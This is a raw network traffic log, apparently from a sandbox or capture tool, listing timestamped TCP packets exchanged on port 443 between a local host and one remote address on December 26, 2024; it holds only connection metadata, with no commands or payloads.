Dec 26, 2024 18:26:51.328516006 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.328561068 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.334713936 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.334728956 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.334800959 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.334806919 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.334860086 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.342315912 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.342330933 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.342396975 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.342406034 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.342456102 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.504522085 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.504542112 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.504632950 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.504642963 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.504714966 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.511626959 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.511641026 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.511729956 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.511735916 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.511780977 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.518022060 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.518044949 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.518127918 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.518131971 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.518184900 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.525161982 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.525187016 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.525244951 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.525249004 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.525290966 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.532180071 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.532203913 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.532268047 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.532279015 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.532335997 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.538855076 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.538871050 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.538930893 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.538937092 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.538980961 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.546010017 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.546025991 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.546103954 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.546109915 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.546164989 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.552675962 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.552690029 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.552772045 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.552778006 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.552822113 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.715013027 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.715037107 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.715121031 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.715131044 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.715178967 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.722121000 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.722136021 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.722213984 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.722219944 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.722265959 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.728359938 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.728379011 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.728451967 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.728456974 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.728512049 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.735601902 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.735616922 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.735702991 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.735708952 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.735749960 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.742680073 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.742697954 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.742763996 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.742769957 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.742814064 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.749362946 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.749377012 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.749445915 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.749450922 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.749499083 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.756515026 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.756532907 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.756603956 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.756608009 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.756659031 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.763190985 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.763206005 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.763267994 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.763273001 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.763317108 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.929805040 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.929820061 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.929889917 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.929898977 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.929940939 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.936134100 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.936150074 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.936213017 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.936218977 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.936264992 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.943309069 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.943329096 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.943392992 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.943398952 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.943447113 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.950438023 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.950453043 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.950515032 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.950520992 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.950561047 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.957581997 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.957597017 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.957669020 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.957674026 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.957716942 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.964234114 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.964247942 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.964318037 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.964323044 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.964371920 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.970525980 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.970539093 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.970616102 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.970622063 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.970669031 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.977684975 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.977703094 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.977776051 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:51.977781057 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:51.977827072 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.140389919 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.140407085 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.140499115 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.140506029 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.140552998 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.147517920 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.147532940 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.147604942 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.147609949 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.147653103 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.153978109 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.153991938 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.154068947 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.154073954 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.154118061 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.160996914 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.161010981 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.161083937 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.161088943 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.161130905 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.168195963 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.168209076 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.168277979 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.168282032 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.168323994 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.174731016 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.174745083 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.174808979 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.174813986 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.174860954 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.181832075 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.181847095 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.181910992 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.181915998 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.181962013 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.188247919 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.188262939 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.188325882 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.188330889 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.188384056 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.351624966 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.351644039 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.351732016 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.351737022 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.351788044 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.357553959 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.357567072 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.357634068 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.357639074 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.357702017 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.364815950 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.364830017 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.364891052 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.364896059 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.364943981 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.371882915 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.371896982 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.371958017 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.371962070 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.372009993 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.379003048 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.379017115 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.379076004 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.379080057 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.379126072 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.385710955 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.385725021 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.385787010 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.385792017 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.385845900 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.392050982 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.392066002 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.392128944 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.392133951 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.392185926 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.399267912 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.399281025 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.399343967 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.399348021 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.399398088 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.561530113 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.561547041 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.561630964 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.561639071 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.561680079 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.568564892 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.568581104 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.568662882 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.568666935 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.568715096 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.575913906 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.575928926 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.576004028 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.576009035 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.576056004 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.582056046 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.582071066 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.582139015 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.582144022 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.582201004 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.589396000 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.589411020 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.589478970 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.589483976 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.589531898 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.595910072 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.595923901 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.595993996 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.595998049 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.596041918 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.602998972 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.603018999 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.603084087 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.603087902 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.603138924 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.613212109 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.613225937 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.613298893 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.613303900 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.613358974 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.772182941 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.772198915 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.772291899 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.772298098 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.772341013 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.779160976 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.779181004 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.779251099 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.779256105 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.779306889 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.786381960 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.786396027 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.786473036 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.786482096 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.786530018 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.792630911 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.792644978 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.792732954 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.792742014 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.792792082 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.799895048 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.799909115 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.799983025 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.799993992 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.800035000 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.806528091 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.806543112 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.806608915 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.806615114 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.806657076 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.813611984 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.813628912 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.813688993 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.813694000 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.813735962 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.813769102 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.824131966 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.824146032 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.824222088 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.824228048 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.824280024 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.983122110 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.983139992 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.983287096 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.983297110 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.983364105 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.990211964 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.990257978 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.990312099 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.990318060 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.990365982 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.990381002 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.996601105 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.996615887 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.996710062 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:52.996715069 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:52.996767998 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.003689051 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.003703117 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.003783941 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.003788948 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.003842115 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.010654926 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.010669947 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.010746956 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.010752916 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.010807037 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.017371893 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.017386913 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.017466068 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.017472029 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.017527103 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.024548054 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.024569988 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.024648905 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.024652958 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.024709940 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.034631968 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.034647942 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.034728050 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.034734011 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.034775972 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.193169117 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.193186998 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.193291903 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.193299055 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:53.193350077 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:53.200373888 CET	443	49719	172.67.214.186	192.168.2.16
